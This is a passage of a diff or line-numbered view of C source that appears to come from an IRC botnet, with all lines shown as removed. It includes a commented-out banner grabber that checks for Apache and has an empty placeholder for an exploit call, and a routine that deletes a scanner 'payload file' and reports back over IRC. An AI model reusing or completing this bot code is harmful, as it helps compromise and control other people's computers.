| 550 |
-
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
|
| 551 |
-
nb = 1;
|
| 552 |
-
if (fconnect(sSock, (const sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
|
| 553 |
-
{
|
| 554 |
-
fsend(sSock, request, lstrlen(request), 0);
|
| 555 |
-
fioctlsocket(sSock, FIONBIO, &nb);
|
| 556 |
-
FD_ZERO(&fd_struct);
|
| 557 |
-
FD_SET(sSock, &fd_struct);
|
| 558 |
-
if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
|
| 559 |
-
|
| 560 |
-
if((n = read(sSock, buffer, sizeof(buffer) - 1)) < 0) return NULL;
|
| 561 |
-
for (d=0;d<n;d++) if (!strncmp(buffer+d,"Server: ",strlen("Server: ")))
|
| 562 |
-
{
|
| 563 |
-
start=buffer+d+strlen("Server: ");
|
| 564 |
-
for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
|
| 565 |
-
}
|
| 566 |
-
// FIXME: make this as a list with returns pointing to there exploit.
|
| 567 |
-
if (lstrcmpi(start, "Apache") == 0)
|
| 568 |
-
|
| 569 |
-
{
|
| 570 |
-
|
| 571 |
-
// the call to the exploit...
|
| 572 |
-
}
|
| 573 |
-
}
|
| 574 |
-
}
|
| 575 |
-
fclosesocket(sSock);
|
| 576 |
-
return 0;
|
| 577 |
-
}
|
| 578 |
-
*/
|
| 579 |
-
|
| 580 |
-
/*
|
| 581 |
-
void DelPayloadFile(SOCKET sock, char *chan, BOOL notice, BOOL silent)
|
| 582 |
-
{
|
| 583 |
-
char sendbuf[IRCLINE];
|
| 584 |
-
|
| 585 |
-
if (findthreadid(SCAN_THREAD) > 0)
|
| 586 |
-
sprintf(sendbuf ,"[SCAN]: Scanner is running. Could not delete payload file.");
|
| 587 |
-
else {
|
| 588 |
-
if (GetFileAttributes(szLocalPayloadFile) != INVALID_FILE_ATTRIBUTES) {
|
| 589 |
-
SetFileAttributes(szLocalPayloadFile,FILE_ATTRIBUTE_NORMAL);
|
| 590 |
-
|
| 591 |
-
if (DeleteFile(szLocalPayloadFile))
|
| 592 |
-
sprintf(sendbuf,"[SCAN]: Removed payload file: '%s'.", szLocalPayloadFile);
|
| 593 |
-
else
|
| 594 |
-
sprintf(sendbuf,"[SCAN]: Failed to remove payload file: '%s'.", szLocalPayloadFile);
|
| 595 |
-
} else
|
| 596 |
-
sprintf(sendbuf,"[SCAN]: Payload file: '%s' does not exist.", szLocalPayloadFile);
|
| 597 |
-
}
|
| 598 |
-
if (!silent) irc_privmsg(sock,chan,sendbuf,notice);
|
| 599 |
-
addlog(sendbuf);
|
| 600 |
-
|
| 601 |
-
return;
|
| 602 |
-
}
|
| 603 |
-
*/
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|